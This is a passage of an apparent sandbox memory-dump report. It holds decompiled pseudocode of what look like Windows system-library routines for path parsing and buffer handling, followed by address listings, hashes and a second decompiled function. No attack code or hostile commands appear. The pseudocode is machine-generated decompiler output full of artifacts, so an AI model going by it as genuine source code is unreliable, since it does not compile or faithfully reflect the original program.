													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E033DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E033DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E033DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E033DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E033DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E033DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E033DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03464CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E033ED130(_t427, _t494, _t511);
				}
			}

0x03465ba5
0x03465baa
0x03465baf
0x03465bb4
0x03465bb6
0x03465bbc
0x03465bbe
0x03465bc4
0x03465bcd
0x03465bd3
0x03465bd6
0x03465bdc
0x03465be0
0x03465be3
0x03465beb
0x03465bf2
0x03465bf8
0x03465bfe
0x03465c04
0x03465c0e
0x03465c18
0x03465c1f
0x03465c25
0x03465c2a
0x03465c2c
0x03465c32
0x03465c3a
0x03465c3f
0x03465c42
0x03465c48
0x03465c5b
0x03465c5b
0x03465c2c
0x03465cb7
0x03465cb9
0x03465cbf
0x03465cc2
0x03465cca
0x03465ccb
0x03465ccb
0x03465cd1
0x03465cd7
0x03465cda
0x03465ce1
0x03465ce4
0x03465ce7
0x03465ced
0x03465cf3
0x03465cf9
0x03465cff
0x03465d08
0x03465d0a
0x03465d0e
0x03465d10
0x00000000
0x00000000
0x03465d16
0x03465d1a
0x00000000
0x00000000
0x03465d20
0x03465d22
0x03465d25
0x03465d2f
0x03465d2f
0x03465d33
0x03465d3d
0x03465d49
0x03465d4b
0x00000000
0x00000000
0x03465d5a
0x03465d5d
0x03465d60
0x00000000
0x00000000
0x03465d66
0x03465d69
0x00000000
0x00000000
0x03465d6f
0x03465d6f
0x03465d73
0x03465d79
0x03465d7f
0x03465d86
0x03465d95
0x03465d98
0x03465dba
0x03465dcb
0x03465dce
0x03465dd3
0x03465dd6
0x03465dd8
0x03465de6
0x03465dec
0x03465dee
0x03465df1
0x03465df3
0x0346635a
0x0346635a
0x00000000
0x0346635a
0x03465dfe
0x03465e02
0x03465e05
0x03465e07
0x03465e10
0x03465e13
0x03465e1b
0x03465e1c
0x03465e21
0x03465e22
0x03465e23
0x03465e25
0x03465e2a
0x03465e2c
0x03465e2e
0x03465e36
0x03465e39
0x03465e42
0x03465e47
0x03465e4d
0x03465e54
0x03465e54
0x03465e54
0x03465e2e
0x03465e5c
0x03465e5f
0x03465e62
0x03465e64
0x03465e6b
0x03465e70
0x03465e7a
0x03465e7a
0x03465e7a
0x03465e6b
0x03465e7e
0x03465e7f
0x03465e7f
0x03465e81
0x03465e87
0x03465e8b
0x03465e8c
0x03465e8c
0x03465e8c
0x03465e9a
0x03465e9c
0x03465ea2
0x03465ea6
0x03465f50
0x03465f50
0x03465f57
0x03465f66
0x03465f66
0x03465f66
0x03465f68
0x03465f6a
0x034663d0
0x00000000
0x03465f70
0x03465f70
0x03465f91
0x03465f9c
0x03465f9e
0x03465fa4
0x03465fa6
0x0346638c
0x03466392
0x034663a1
0x034663a7
0x034663af
0x034663af
0x034663bd
0x034663d8
0x00000000
0x034663d8
0x03465fac
0x03465fb2
0x03465fb4
0x03465fbd
0x03465fc6
0x03465fce
0x03465fd4
0x03465fdc
0x03465fec
0x03465fed
0x03465fee
0x03465fef
0x03465ff9
0x03465ffa
0x03465ffb
0x03465ffc
0x03466000
0x03466004
0x03466012
0x03466012
0x03466018
0x03466019
0x0346601a
0x0346601b
0x0346601c
0x03466020
0x03466059
0x0346605c
0x03466061
0x03466061
0x03466022
0x03466022
0x03466022
0x03466025
0x0346602a
0x0346602b
0x03466031
0x03466037
0x03466038
0x0346603e
0x03466048
0x03466049
0x0346604a
0x0346604b
0x0346604c
0x0346604d
0x03466053
0x03466054
0x03466054
0x03466062
0x03466065
0x03466067
0x0346606a
0x03466070
0x03466075
0x03466076
0x03466081
0x03466087
0x03466095
0x03466099
0x0346609e
0x034660a4
0x034660ae
0x034660b0
0x034660b3
0x034660b6
0x034660b8
0x034660ba
0x034660ba
0x034660ba
0x034660ba
0x034660be
0x034660c0
0x034660c5
0x034660c5
0x034660c5
0x034660c6
0x034660cd
0x03466114
0x034660cf
0x034660cf
0x034660d4
0x034660d5
0x034660da
0x034660db
0x034660e1
0x034660e2
0x034660e8
0x034660f8
0x034660fd
0x034660fe
0x03466102
0x03466104
0x03466107
0x03466109
0x0346610b
0x0346610b
0x0346610b
0x0346610b
0x0346610f
0x0346610f
0x03466117
0x0346611a
0x0346611f
0x03466125
0x03466134
0x03466139
0x0346613f
0x03466146
0x03466148
0x0346614b
0x0346614d
0x0346614f
0x0346614f
0x0346614f
0x0346614f
0x03466153
0x03466159
0x03466159
0x0346615c
0x03466163
0x03466169
0x0346616c
0x03466172
0x03466181
0x03466186
0x03466187
0x0346618b
0x03466191
0x03466195
0x034661a3
0x034661bb
0x034661c0
0x034661c3
0x034661cc
0x034661d0
0x034661dc
0x034661de
0x034661e1
0x034661e4
0x034661e6
0x034661e8
0x034661e8
0x034661e8
0x034661e8
0x034661e6
0x034661ec
0x034661f3
0x03466203
0x03466209
0x0346620a
0x03466216
0x0346621d
0x03466227
0x03466241
0x03466246
0x0346624c
0x03466257
0x03466259
0x0346625c
0x0346625e
0x03466260
0x03466260
0x03466260
0x03466260
0x0346625e
0x03466264
0x03466267
0x03466269
0x03466315
0x03466315
0x0346631b
0x0346631e
0x03466324
0x03466327
0x0346632f
0x03466330
0x03466333
0x0346633a
0x0346633c
0x03466335
0x03466335
0x03466335
0x0346633f
0x03466342
0x0346634c
0x03466352
0x03466355
0x03466355
0x03466359
0x00000000
0x0346626f
0x03466275
0x03466275
0x03466278
0x0346627e
0x0346627e
0x03466281
0x03466287
0x0346628d
0x03466298
0x0346629c
0x034662a2
0x0346629e
0x0346629e
0x0346629e
0x034662a7
0x034662a7
0x034662aa
0x034662b0
0x034662f0
0x034662f0
0x034662f2
0x034662f8
0x034662fd
0x034662b2
0x034662b2
0x034662b2
0x034662b5
0x034662dd
0x034662e2
0x034662e5
0x034662b7
0x034662b8
0x034662bb
0x034662bd
0x034662c0
0x034662c4
0x034662cd
0x034662cd
0x034662c0
0x034662bb
0x034662b5
0x03466302
0x03466303
0x03466305
0x03466305
0x03466305
0x0346630c
0x0346630c
0x00000000
0x0346627e
0x03466269
0x03465eac
0x03465ebb
0x03465ebe
0x03465ecb
0x03465ecb
0x03465ece
0x03465ece
0x03465ed4
0x03465ed7
0x03465ed9
0x03465edb
0x03465edb
0x03465ee1
0x03465ee1
0x03465ee3
0x03465f20
0x03465f20
0x03465ee5
0x03465ee5
0x03465ee5
0x03465ee8
0x03465f11
0x03465f18
0x03465eea
0x03465eea
0x03465eed
0x03465ef2
0x03465ef8
0x03465efb
0x03465f0a
0x03465f0a
0x03465eed
0x03465ee8
0x03465f22
0x03465f28
0x00000000
0x00000000
0x03465f30
0x03465f31
0x03465f37
0x03465f3a
0x03465f3d
0x03465f44
0x00000000
0x00000000
0x00000000
0x03465f46
0x03465f48
0x03465f4d
0x00000000
0x03465f4d
0x03465dda
0x03465ddf
0x00000000
0x03465ddf
0x03465dd8
0x03465da7
0x03465da9
0x03465dac
0x03465dae
0x00000000
0x03465db4
0x03465db4
0x00000000
0x03465db4
0x03465dae
0x03465d88
0x03465d8d
0x03466363
0x03466369
0x0346636a
0x03466370
0x03466372
0x0346637a
0x0346637b
0x0346637d
0x00000000
0x00000000
0x0346637f
0x03466385
0x00000000
0x03466385
0x03465d38
0x03465d3b
0x00000000
0x00000000
0x00000000
0x03465d3b
0x03465d27
0x03465d29
0x00000000
0x00000000
0x00000000
0x03466360
0x00000000
0x03466360
0x03465c10
0x03465c10
0x034663da
0x034663e5
0x034663e5

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34d00fc4706c9959a49fcbd4715618deae59d7f6d995c5911e5dc1d0818fd37
Instruction ID: f2620cc9dc5400fda40f1e318e8e26c35574a131972523badbcb2a67563365ed
Opcode Fuzzy Hash: e34d00fc4706c9959a49fcbd4715618deae59d7f6d995c5911e5dc1d0818fd37
Instruction Fuzzy Hash: 39425775A002298FDB24CF68C880BAAB7B1FF49304F1981EAD95DEB342D7349985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 033B4120, Relevance: 1.9, APIs: 1, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E033B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x348d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E033CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E033B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L033B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E033B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M033B45F8))) {
												case 0:
													_v568 = 0x3371078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x33711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L033B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E033DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E033DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E033952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E033AEB70(1, 0x34879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E033AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			NtClose( *(_t324 + 4));
																			L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *(_t306 + 8) =  *(_t324 + 4);
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E033DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
